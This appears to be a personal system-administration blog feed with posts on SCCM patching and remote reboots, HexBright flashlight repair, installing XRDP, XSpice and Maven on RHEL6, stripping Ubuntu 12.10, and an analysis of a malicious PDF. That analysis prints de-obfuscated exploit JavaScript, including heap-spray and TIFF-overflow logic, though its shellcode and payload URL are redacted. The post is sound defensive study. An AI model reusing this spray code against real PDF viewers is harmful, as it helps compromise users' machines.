Recent Updates Toggle Comment Threads | Keyboard Shortcuts

  • Nickolas Golubev 8:13 pm on December 26, 2017 Permalink | Reply  

    Install all available SCCM updates and reboot remote Windows machines 

    Ever needed to install every patch available in SCCM to multiple Windows machines, but have no SCCM access to push installs?

    I found this excellent script made by Eswar Koneti:

    It reads the clients.txt file for a list of hostnames / IPS, connects to each one remotely and installs everything avaible in SCCM.

    I also made an additional tool in order to automatically reboot all machines that are included in clients.txt.

    With both scripts you can push all security updates to your windows machines and then reboot them.


    *Edit clients.txt and put in the list of machines you would like to update and reboot. Either hostnames or IPs work.
    *Open a powershell prompt:
    *Set execution policy to allow for the execution of un-signed scripts.
    *Type “y” and press enter

    Set-ExecutionPolicy -scope Process -ExecutionPolicy Bypass

    *Now run the SCCM update script


    *Eswar’s script will create a InstallUpdates.log, check for errors.
    *Wait a few minutes for updates to install and then run the reboot all script, type “yes” to continue.


    *My script will create a reboot.log, check for errors.

    Download here:

  • Nickolas Golubev 11:50 pm on December 20, 2017 Permalink | Reply  

    Fixing a Hexbright 

    The HexBright came out as a KickStarter project several years ago. The light features a user programmable Atmega168, solid aluminum body, CREE XM-L U2 LED, accelerometer and temperature sensors. Since the lights are no longer available and are of such high quality I have had the pleasure of undertaking the repair of two of them.

    There are 4 common problems with the HexBright flashlight:.

    1) Battery will not charge and flash light does not turn on after being left off in storage for a long period of time. This is caused by the battery draining to the point where the internal protection circuitry on the battery will not allow for it to be charged back up.
    — symptom: flash light does not turn on

    Dropping the flashlight and causing the internal 16mhz SMD crystal to break.
    — symptom: flash light does not turn on

    USB connector breaking off of the board.
    — symptom: can not charge or connect flashlight via USB to computer

    Reverse battery insertion. With no reverse polarity protection this can destroy many things.
    –symptom: flash light does not turn on, battery was inserted the wrong way, magic smoke.

    The solutions:

    1) The battery is the easiest to replace. The LGABD11865 18650 D1 3000mAh is a good fit and offers on-board protection. In this case it is good to remove the 2 screws holding the battery spacer in place, drop the battery in and then put the spacer back in. If you do not do this the battery is too hard to wedge in and the insulation on it can be damaged.

    2) The crystal is probably the second easiest to replace. These can be had very cheap on eBay 10PCS 16M 16.000M 16MHz 16.000MHz Passive Crystal 3225 3.2mm×2.5mm SMD-4PIN You can use a slightly smaller crystal than originally came with the flashlight as the pads extend out quite far.

    You will need hot air and flux to remove the old crystal and replace it.

    3) The connector may need to be fully replaced or the pads may need to just be re connected. This is a delicate procedure as hot air can melt plastic. Plenty of flux helps. With my specific case the pads just needed to be reconnected with the pins. A glob of solder and subsequent solder wick did the job.

    4) This is the most complex issue to fix. Because there is no reverse polarity protection on the light I found that 3 ICs were destroyed on the board and 2 pads under the LED driver IC were burned. The parts can be bought on either eBay or DigiKey.

    1) TPS63020DSJR, LED Driver IC3

    2) MIC5353-3.3YMT-TR, Voltage regulator IC7

    3) Mcp73831t-2Ac, Lion charge controller IC5

    Hot air and plenty of flux was required to remove the broken ICs. The LED and leads should be removed from the board so that the board can be worked on easier. To repair the 2 broken leads on the LED driver copper tape was needed as well as liquid solder to re-tin the pads after clean up.

    All fixed:

    • nobody 10:35 pm on May 3, 2018 Permalink | Reply

      it’s not a 16mhz xtal to repair either v1 or v2 boards (2 pad or 4 pad crystal) it’s 8mhz.

  • Nickolas Golubev 11:12 pm on December 20, 2017 Permalink | Reply  

    Hexbright schematics 

    This is in relation to the next post. These were found while searching the internet on:

  • Nickolas Golubev 11:15 pm on January 27, 2014 Permalink | Reply
    Tags: , linux, open source, rdp, , , xrdp   

    Installing XRDP onto RHEL6 / Red Hat Enterprise Server 

    I was told by a senior colleague that XRDP ( is a great way to remotely connect to your Linux servers through windows remote desktop protocol. It extends an XOrg session through through VNC and then the RDP. Here is how you can get it working on RHEL6!

    sudo yum install gcc make pam-devel openssl-devel vnc-server autoconf automake libtool libX11-devel libXfixes-devel


    tar zxvf xrdp-v0.6.1.tar.gz
    cd xrdp-v0.6.1
    sudo make install

    Add user(s) to the 100, “users” group to allow them to login via RDP

    sudo nano /etc/group

    Edit iptables to permit inbound RDP

    sudo nano /etc/sysconfig/iptables


    -F INPUT
    -A INPUT -m state --state NEW -m tcp -p tcp --dport 3389 -j ACCEPT

    sudo service iptables restart

    Make it a little more secure by enabling 128 bit 2-way encryption

    sudo nano /etc/xrdp/xrdp.ini

    Change crypt_level=low to crypt_level=high

    Generate a new RSA key

    sudo /usr/local/bin/xrdp-keygen xrdp auto

    Start XRDP up and then try and connect to it using remote desktop client in Windows

    sudo /etc/xrdp/ start

    Finally make XRDP auto start as a service.

    sudo ln -s /etc/xrdp/ /etc/init.d/xrdp
    sudo chkconfig --add xrdp
    sudo chkconfig xrdp on
    sudo service xrdp start

  • Nickolas Golubev 7:36 pm on December 27, 2013 Permalink | Reply  

    Installing XSpice (xf86-video-qxl-0.1.0) onto Redhat Enterprise Server 6 RHEL6 

    I have been working on getting XSpice enabled on x64 RHEL6. XSpice is an X11 driver that allows for remote connections much like VNC. This install is not trivial as XSpice is still an experimental product so there are only packaged / repoed versions of it for Fedora Core.

    Firstly RHEL optional RPMS must be enabled

    #nano /etc/yum.repos.d/redhat.repo

    enable rhel-6-server-optional-rpms

    Now install a bunch of packages.

    #yum install kdebase
    #yum install xorg*
    #yum install spice-server-devel
    #yum install python-argparse
    #yum install xorg-x11-util-macros*
    #yum install spice-server-devel spice-protocol

    Now download / make / install randr:

    #tar zxvf randr12.v1.tar.gz
    #cd wip/randr12.v1
    #make install

    Now get xf86-video-qxl-0.1.1 and xf86-video-qxl-0.1.0

    #tar zxvf xf86-video-qxl-0.1.1.tar.gz

    #tar zxvf xf86-video-qxl-0.1.0.tar.gz

    Compile the 0.1.0 version (the 0.1.1 would not configure / make due to a library dependency issue with RHEL6)

    #cd xf86-video-qxl-0.1.0
    #autoreconf -i && ./configure --enable-xspice && make
    #make install
    #cp src/.libs/ /usr/lib64/xorg/modules/drivers/

    I copied the XSpice startup script and X11 config from xf86-video-qxl-0.1.1 because it has more startup options yet is backwards compatible with xf86-video-qxl-0.1.0

    #cd ..
    #cp xf86-video-qxl-0.1.1/scripts/Xspice /home/normal_user_account/
    #cp xf86-video-qxl-0.1.1/examples/spiceqxl.xorg.conf.example /etc/X11/spiceqxl.xorg.conf
    chown normaluser.normaluser /home/normal_user_account/Xspice

    Now add iptable rules if you have iptables enabled

    #nano /etc/sysconfig/iptables
    -F INPUT
    -A INPUT -m state --state NEW -m tcp -p tcp --dport 5900:5950 -j ACCEPT
    #service iptables restart

    Now drop back to a normal, non-root account and run the XSpice script:

    #cd ~
    #./Xspice --port 5903 :4.0 --xsession /usr/bin/startkde --disable-ticketing

    I am starting a KDE session instead of a GNOME because there seems to be a bug preventing GNOME from working with Xspice (

    Do not run this as root! there is no password and it should just be used for testing unless you enable stronger authentication.

    You can now connect using the virt-viewer client (

  • Nickolas Golubev 10:35 pm on December 5, 2013 Permalink | Reply
    Tags: , java, jdk, maven, ,   

    Installing MAVEN on Red Hat Enteprise Server 6.x (rhel6) 

    Just had to install maven on a rhel6 box… not sure why it is not in the yum / up2date repo.

    First you need JDK7.x:

    get it at:

    “Linux x64 116.91 MB jdk-7u45-linux-x64.rpm”

    install the RPM using

    rpm -Uvh jdk-7u45-linux-x64.rpm

    then remove openJRE from the alternatives list:

    alternatives --list java
    alternatives --remove java /usr/lib/jvm/jre-1.7.0-openjdk.x86_64/bin/java

    Double check the java version:

    java -version

    It should say:
    java version "1.7.0_45"
    Java(TM) SE Runtime Environment (Build 1.7.0_45-b18)

    Now go to the Maven site:

    and get the latest version of 2.x or 3.x (using 2.2.1 here)


    and install:
    tar zxvf apache-maven-2.2.1-bin.tar.gz
    mv apache-maven-2.2.1 /opt/
    ln -s /opt/apache-maven-2.2.1 /opt/maven
    nano /etc/profile.d/

    paste this:

    export JAVA_HOME=/usr/java/latest
    export MAVEN_HOME=/opt/maven
    export M2_HOME=$MAVEN_HOME
    export PATH=$PATH:$MAVEN_HOME/bin

    -save (ctrl-o)

    -new session


    mvn --version

    Should say:

    Apache Maven 2.2.1

  • Nickolas Golubev 10:27 pm on December 4, 2013 Permalink | Reply
    Tags: import, move, wordpress   

    Just moved the whole site from to a wordpress site on my own hosting provider. Seems like a smooth transition!

  • Nickolas Golubev 3:02 am on March 6, 2013 Permalink | Reply  

    De-Crappify Ubuntu 12.10 (Quantal Quetzal) and remove Unity / Lenses / Amazon / Etc… 

    I have not used Ubuntu in a couple of versions and just installed Ubuntu 12.10 (Quantal Quetzal) i386 as a fresh install.

    I was mortified by the amount of junk bundled with this new version including Amazon shopping ad integration. Check out for more info on Ubuntu’s take on this.

    Long story short, it had to be purged!

    Here is the script (to be run as root) I came up with to remove all the new junk and install back GNOME.

    apt-get --yes purge gnome-control-center-signon
    apt-get --yes purge unity unity-2d unity-2d-places unity-2d-panel unity-2d-spread
    apt-get --yes purge unity-asset-pool unity-services unity-lens-* unity-scope-*
    apt-get --yes purge liboverlay-scrollbar*
    apt-get --yes purge appmenu-gtk appmenu-gtk3 appmenu-qt
    apt-get --yes purge firefox-globalmenu thunderbird-globalmenu
    apt-get --yes purge unity-2d-common unity-common
    apt-get --yes purge libunity-misc4 libunity-core-5*
    apt-get --yes purge ubuntuone-client python-ubuntuone-storage*
    add-apt-repository ppa:gnome3-team/gnome3 && apt-get -f update
    apt-get --yes -f install gnome-shell gnome-tweak-tool gnome-session-fallback
    rm -rf /usr/share/applications/ubuntu-amazon-default.desktop
    rm -rf /usr/share/applications/UbuntuOneMusiconeubuntucom.desktop

    Secondly to remove the Guest login and Remote login options from the login screen (a security issue in my opinion) run this:

    /usr/lib/lightdm/lightdm-set-defaults --allow-guest false --show-remote-login false

    And now you have a pretty decent new version of Ubuntu that is not sending your personal data back to Amazon.

  • Nickolas Golubev 10:59 pm on January 28, 2013 Permalink | Reply  

    Decoding a PDF Virus E-Mail 

    Today I received a malicious email via gmail.

    Title: “Check this. It might be useful for u.”
    From: via 11:55 AM (2 hours ago) to Nick

    With some garbled HTML data in the text area and a MIME PDF attachment “621624.pdf”

    The email came from a someone who must have had me on their address book as I communicated with them previously years ago.

    Of course I had to investigate and uploaded the pdf to for further analysis.

    The PDF contained a hidden javascript package which was further obfuscated.

    After manually de-obfuscating the code I came up with:

    var encoded = "a3tf31jre0........." (redacted)
    var decode1 = encoded.replace(/a3tf31jre/g,"%");
    var decoded = unescape(decode1);

    The encoded string breaks out to:

    var j_IgC = [31, 31, 15, 23];

    function _k_m()
    return app;

    function _b_(xVgFqV)
    var ___N = "";
    ___N = unescape(xVgFqV);
    return ___N;

    function get_ver()
    var ver = _k_m().viewerVersion.toString();
    ver = ver.replace(".", "");
    while (ver.length < 4)
    ver += "0";
    ver = parseInt(ver, 10);
    return ver;

    function make_block(xVgFqV, len)
    while (xVgFqV.length * 2 < len)
    xVgFqV += xVgFqV;
    xVgFqV = xVgFqV.substring(0, len/ 2);
    return xVgFqV;

    function heap_spray3(scode)
    scode = _b_(scode);
    var sclen = scode.length * 2;
    var fasdds = _b_("%u9090");
    var spray = make_block(fasdds,0x2000 - sclen);
    var block = scode + spray;
    block = make_block(block,0x80000 - 0x40);
    for (var i = 0;i<0x190;i ++)
    j_IgC[i] = block.substr(0,block.length - 1) + fasdds;

    function make_str(xVgFqV,len)
    while (xVgFqV.length < len){ xVgFqV += xVgFqV; }
    xVgFqV = xVgFqV.substring(0, len);
    return xVgFqV;

    function num2hex(num)
    var xVgFqV = num.toString(16);
    var len = xVgFqV.length;
    var ret = (len % 2) ? "0" + xVgFqV : xVgFqV;
    return ret;

    function str2uni(xVgFqV)
    var ret = "";
    for (var i = 0;i < xVgFqV.length;i += 2)
    ret += "%u";
    ret += num2hex(xVgFqV.charCodeAt(i + 1));
    ret += num2hex(xVgFqV.charCodeAt(i));
    return ret;

    function hex2str(hex)
    var ret = "";
    for (var i = 0;i < hex.length;i += 2) { var b = hex.substr(i,2); var num = parseInt(b,16); ret += String.fromCharCode(num); } return ret; } exploit(); function exploit() { var ver = get_ver(); if (ver >= 8000)
    var tiff = "SUkqADggAABB";
    var nops = make_str("QUFB",0x2ae8);
    var start "..."; (redacted)
    var foot = "";
    var sc_hex = "";

    if (ver < 8201)
    foot = "..."; (redacted)
    var sc_hex = "..."; (redacted)
    foot = "..."; (redacted)
    sc_hex = "..."; (redacted)

    if (foot.length)
    var ret = [tiff,nops,start,foot].join("");
    var sc_str = hex2str(sc_hex);
    var scode = str2uni(sc_str);
    pwzh6lr.rawValue = ret;

    After the PDF viewer is “heap sprayed” ( ) the exploit payload that is injected goes out to download (redacted). I have not analyzed the executable it self but would imagine that it is some sort of a trojan.

  • Nickolas Golubev 6:54 pm on June 23, 2011 Permalink | Reply  

    The dangers of stovepipe security 

    The recent events with Sony have got me thinking about the dangers of “stovepipe” security… (

    A stovepipe is an organizational structure hinders cross organizational communications and collaboration.  It can be theorized that the different  sub companies / groups within Sony worked in a stove pipe security type model. There was likely no over-arching security guidance / policy or common, authoritative security department.

    Large enterprises should always have a clear and common security policy and a common corporate security department. Information about attacks and fixes at one department should be shared with others in an effort to combat any further damage.

    Lastly an organization should follow standard security standards like the ISO 27002  ( Why re-invent the wheel when proven, practical methodology already exists?

compose new post
next post/next comment
previous post/previous comment
show/hide comments
go to top
go to login
show/hide help
shift + esc